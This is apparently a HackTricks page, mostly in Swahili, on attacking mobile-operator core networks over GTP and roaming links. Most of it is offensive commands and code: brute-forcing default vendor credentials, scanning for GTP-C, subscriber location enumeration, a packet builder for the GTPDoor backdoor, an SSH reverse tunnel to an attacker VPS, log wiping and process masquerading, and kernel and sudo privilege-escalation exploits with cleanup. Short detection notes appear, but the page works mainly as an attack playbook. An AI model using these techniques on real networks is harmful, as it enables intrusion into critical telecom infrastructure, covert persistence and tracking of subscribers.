6.4 KiB
Telecom Network Exploitation (GTP / Roaming Environments)
{{#include ../../banners/hacktricks-training.md}}
Note
Protokali za msingi za simu (GPRS Tunnelling Protocol – GTP) mara nyingi hupita kwenye mifumo ya GRX/IPX ya kuhamahama ambayo inaaminika kwa kiasi fulani. Kwa sababu zinatumia UDP bila uthibitisho wowote, mara nyingi mguu wowote ndani ya mipaka ya telecom unaweza kufikia moja kwa moja ndege za ishara za msingi. Maelezo yafuatayo yanakusanya mbinu za mashambulizi zilizoshuhudiwa katika mazingira halisi dhidi ya SGSN/GGSN, PGW/SGW na nodi nyingine za EPC.
1. Recon & Initial Access
1.1 Default OSS / NE Accounts
Seti kubwa ya ajabu ya vipengele vya mtandao wa wauzaji huja na watumiaji wa SSH/Telnet waliowekwa kwa nguvu kama root:admin, dbadmin:dbadmin, cacti:cacti, ftpuser:ftpuser, … Orodha ya maneno iliyotengwa huongeza kwa kiasi kikubwa mafanikio ya brute-force:
hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt
Ikiwa kifaa kinatoa tu VRF ya usimamizi, pitisha kupitia mwenyeji wa jump kwanza (tazama sehemu «SGSN Emu Tunnel» hapa chini).
1.2 Ugunduzi wa Mwenyeji ndani ya GRX/IPX
Watoa huduma wengi wa GRX bado wanaruhusu ICMP echo kupitia msingi. Changanya masscan na uchunguzi wa gtpv1 UDP uliojengwa ndani ili haraka kuchora wasikilizaji wa GTP-C:
masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55
2. Kuorodhesha Wajibu – cordscan
Zana hii ya Go inatengeneza GTP-C Create PDP Context Request pakiti na kurekodi majibu. Kila jibu linafunua SGSN / MME inayohudumia IMSI iliyoulizwa na, wakati mwingine, PLMN iliyotembelewa na mteja.
# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
# Usage (typical):
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap
Key flags:
--imsiLengo la mteja IMSI--operNyumbani / HNI (MCC+MNC)-wAndika pakiti za raw kwenye pcap
Misingi muhimu ndani ya binary inaweza kubadilishwa ili kupanua skana:
pingtimeout = 3 // seconds before giving up
pco = 0x218080
common_tcp_ports = "22,23,80,443,8080"
3. Utekelezaji wa Kanuni kupitia GTP – GTPDoor
GTPDoor ni huduma ndogo ya ELF ambayo inafungua UDP 2123 na kuchambua kila pakiti ya GTP-C inayokuja. Wakati mzigo unapoanza na lebo iliyoshirikiwa awali, yaliyobaki yanachambuliwa (AES-128-CBC) na kutekelezwa kupitia /bin/sh -c. Stdout/stderr zinahamishwa ndani ya Echo Response ujumbe ili kwamba hakuna kikao chochote cha nje kinachoundwa.
Pakiti ya PoC ya chini (Python):
import gtpc, Crypto.Cipher.AES as AES
key = b"SixteenByteKey!"
cmd = b"id;uname -a"
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))
Detection:
- mwenyeji yeyote anayepeleka Maombi ya Echo yasiyo sawa kwa IP za SGSN
- Bendera ya toleo la GTP imewekwa kuwa 1 wakati aina ya ujumbe = 1 (Echo) – mabadiliko kutoka kwa spesifiki
4. Pivoting Through the Core
4.1 sgsnemu + SOCKS5
OsmoGGSN inatoa emulators ya SGSN inayoweza kuanzisha muktadha wa PDP kuelekea GGSN/PGW halisi. Mara baada ya kujadiliwa, Linux inapokea kiunganishi kipya cha tun0 kinachoweza kufikiwa kutoka kwa mwenzi wa roaming.
sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
-APN internet -c 1 -d
ip route add 172.16.0.0/12 dev tun0
microsocks -p 1080 & # internal SOCKS proxy
Kwa matumizi sahihi ya firewall hair-pinning, handaki hii inapita VLANs za ishara pekee na inakufikisha moja kwa moja kwenye data plane.
4.2 SSH Reverse Tunnel juu ya Port 53
DNS karibu kila wakati iko wazi katika miundombinu ya kuhamahama. Funua huduma ya ndani ya SSH kwa VPS yako inayosikiliza kwenye :53 na urudi baadaye kutoka nyumbani:
ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com
Check that GatewayPorts yes is enabled on the VPS.
5. Covert Channels
| Channel | Transport | Decoding | Notes |
|---|---|---|---|
ICMP – EchoBackdoor |
ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | msikivu safi, hakuna trafiki ya nje |
DNS – NoDepDNS |
UDP 53 | XOR (key = funnyAndHappy) encoded in A-record octets |
inatazama *.nodep sub-domain |
GTP – GTPDoor |
UDP 2123 | AES-128-CBC blob in private IE | inachanganyika na mazungumzo halali ya GTP-C |
All implants implement watchdogs that timestomp their binaries and re-spawn if crashed.
6. Defense Evasion Cheatsheet
# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp
# Disable bash history
export HISTFILE=/dev/null
# Masquerade as kernel thread
echo 0 > /proc/$$/autogroup # hide from top/htop
printf '\0' > /proc/$$/comm # appears as [kworker/1]
touch -r /usr/bin/time /usr/bin/chargen # timestomp
setenforce 0 # disable SELinux
7. Kuinua Haki kwenye NE za Kizamani
# DirtyCow – CVE-2016-5195
gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd
# PwnKit – CVE-2021-4034
python3 PwnKit.py
# Sudo Baron Samedit – CVE-2021-3156
python3 exploit_userspec.py
Usafi wa mazingira:
userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c
8. Tool Box
cordscan,GTPDoor,EchoBackdoor,NoDepDNS– zana za kawaida zilizoelezwa katika sehemu za awali.FScan: skanning ya TCP ya intranet (fscan -p 22,80,443 10.0.0.0/24)Responder: LLMNR/NBT-NS rogue WPADMicrosocks+ProxyChains: pivoting nyepesi wa SOCKS5FRP(≥0.37) : NAT traversal / bridging ya mali
Detection Ideas
- Kila kifaa kingine isipokuwa SGSN/GGSN kinachounda Maombi ya Kuunda Muktadha wa PDP.
- Bandari zisizo za kawaida (53, 80, 443) zinapokea mikono ya SSH kutoka kwa IP za ndani.
- Maombi ya Echo mara kwa mara bila Majibu ya Echo yanayolingana – yanaweza kuashiria beacon za GTPDoor.
- Kiwango cha juu cha trafiki ya ICMP echo-reply yenye viwanja vikubwa, visivyo na sifuri vya kitambulisho/mfuatano.
References
- Palo Alto Unit42 – Infiltration of Global Telecom Networks
- 3GPP TS 29.060 – GPRS Tunnelling Protocol (v16.4.0)
- 3GPP TS 29.281 – GTPv2-C (v17.6.0)
{{#include ../../banners/hacktricks-training.md}}